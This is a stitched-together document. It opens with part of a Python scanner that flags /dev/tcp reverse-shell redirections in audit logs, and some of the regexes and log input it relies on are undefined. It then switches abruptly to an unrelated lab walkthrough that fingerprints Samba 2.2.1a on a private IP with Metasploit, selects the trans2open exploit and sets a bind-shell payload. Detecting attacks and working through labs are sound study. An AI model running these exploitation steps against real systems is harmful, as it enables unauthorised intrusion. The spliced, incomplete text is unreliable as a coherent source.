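DEV_RE = re.compile(r"^/dev/(tcp|udp)/([^/]+)/(\d+)$")


def descriptor_map(cmd):
    """Map fds 0, 1, 2 to where a command line's redirections leave them.

    Starts from the terminal ("tty") and applies redirections left to right,
    the way bash does: '>&path' sends 1 and 2 to path, 'N>&M' copies M into N.
    """
    fds = {0: "tty", 1: "tty", 2: "tty"}
    toks = cmd.split()
    i = 0
    while i < len(toks):
        m = REDIR_RE.match(toks[i])
        i += 1
        if not m:
            continue
        num, op, amp, target = m.groups()
        if not target:  # operator and target separated by a space
            if i >= len(toks):
                break
            target = toks[i]
            i += 1
        target = target.strip("'\"")
        if amp and target.isdigit():  # N>&M: duplicate descriptor M into N
            fds[int(num) if num else 1] = fds.get(int(target), "tty")
        elif amp:  # >&path: stdout and stderr both to path
            if num:
                fds[int(num)] = target
            else:
                fds[1] = fds[2] = target
        else:  # N>path or N<path (default fd depends on the operator)
            fds[int(num) if num else (0 if op == "<" else 1)] = target
    return fds


def scan(lines):
    """Return one finding per command line that touches /dev/tcp or /dev/udp."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        pid, user, cmd = m.groups()
        fds = descriptor_map(cmd)
        sockets = {fd: v for fd, v in fds.items() if DEV_RE.match(v)}
        if not sockets:
            continue
        # input and output on the same socket = a shell driven over the network
        shell_over_net = 0 in sockets and 1 in sockets and fds[0] == fds[1]
        proto, host, port = DEV_RE.match(next(iter(sockets.values()))).groups()
        findings.append({
            "pid": int(pid),
            "user": user,
            "dest": f"{host}:{port}/{proto}",
            "fds": sorted(sockets),
            "severity": "high" if shell_over_net else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in scan(LOG):
        print(finding)
```

The descriptor replay is deliberately small (whitespace-separated tokens, no quoting rules), which is enough for command lines recorded by process auditing; the point is that the alert keys on the descriptor state rather than on the literal string `bash -i`, so cosmetic rewrites of the same command still trigger it.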

# Samba route

## Port 139

## Probing the version

No ideas; the video says msf can check it, so start msfconsole. SMB (Server Message Block) is a network protocol for sharing files, printers and other resources between computers. Originally developed by Microsoft, it later became a widely used protocol for file and resource sharing on local networks.

```bash
search smb
# smb most commonly uses ports 139 and 445
# msf's console search works a bit like an ordinary search engine: keyword space keyword gives a combined search; we want the version, so search
search smb version
# a module is used with: use <name>
use auxiliary/scanner/smb/smb_version
show options   # show the options; this command should be generic
set rhost 192.168.49.129   # set the target
run   # execute
```

```bash
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.49.129:139    - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.49.129:139    -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.49.129:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

# version obtained: 2.2.1a
msf6 > search smb 2.2.x
[-] No results from search
msf6 > search samba 2.2.x

Matching Modules
================

   #  Name                              Disclosure Date  Rank     Check  Description
   -  ----                              ---------------  ----     -----  -----------
   0  exploit/multi/samba/nttrans       2003-04-07       average  No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   1  exploit/freebsd/samba/trans2open  2003-04-07       great    No     Samba trans2open Overflow (*BSD x86)
   2  exploit/linux/samba/trans2open    2003-04-07       great    No     Samba trans2open Overflow (Linux x86)
   3  exploit/osx/samba/trans2open      2003-04-07       great    No     Samba trans2open Overflow (Mac OS X PPC)
   4  exploit/solaris/samba/trans2open  2003-04-07       great    No     Samba trans2open Overflow (Solaris SPARC)


Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/trans2open
```

I did not fully understand this step: knowing only port 139, how do we get to the names smb and samba to keep searching for vulnerabilities?

Based on the operating system, choose exploit/linux/samba/trans2open.

A payload also has to be set here, which is a blind spot for me:

```bash
set payload linux/x86/shell_bind_tcp
```

Category: Security | Tags: Security | Created: 2024-11-29 14:45:48